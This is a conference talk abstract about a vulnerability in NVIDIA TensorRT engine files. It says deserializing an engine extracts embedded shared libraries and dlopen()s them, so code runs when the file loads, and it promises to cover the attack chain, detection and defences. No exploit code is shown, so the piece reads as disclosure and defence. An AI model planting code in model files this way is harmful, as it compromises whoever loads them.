28KB to Root: Weaponizing NVIDIA's AI Model Files for Native RCE

NVIDIA TensorRT is the go to inference runtime for production AI if a model is running fast on a GPU somewhere, TensorRT is probably involved. It compiles neural networks into optimized `.engine` files that get passed around like any other model artifact: uploaded to HuggingFace, shared between teams, pulled into deployment pipelines. Nobody thinks twice about loading one.

They should.
TensorRT engine files embed real shared libraries. When you call `deserializeCudaEngine()`, NVIDIA's runtime extracts them to `/tmp` and blindly calls `dlopen()` running whatever constructor code is inside. That's it. That's the bug.
The only documented safety flag, `engine_host_code_allowed=False`, does nothing. It guards a different code path entirely. A 28KB engine file is all it takes to get a shell, and it works on the latest TensorRT release.

This talk walks through the full attack chain from crafting the malicious engine to popping a shell on the victim process then pulls back to the bigger picture: TensorRT isn't alone. PyTorch, ONNX, Keras AI model files across the board carry executable code that no one is treating as a threat. We'll cover how to detect it, how to defend against it, and what vendors need to fix.

If your team downloads AI models from anywhere and loads them, this talk is for you.

28KB to Root: Weaponizing NVIDIA's AI Model Files for Native RCE

Talk Abstract

About the Speaker

Arun Krishnan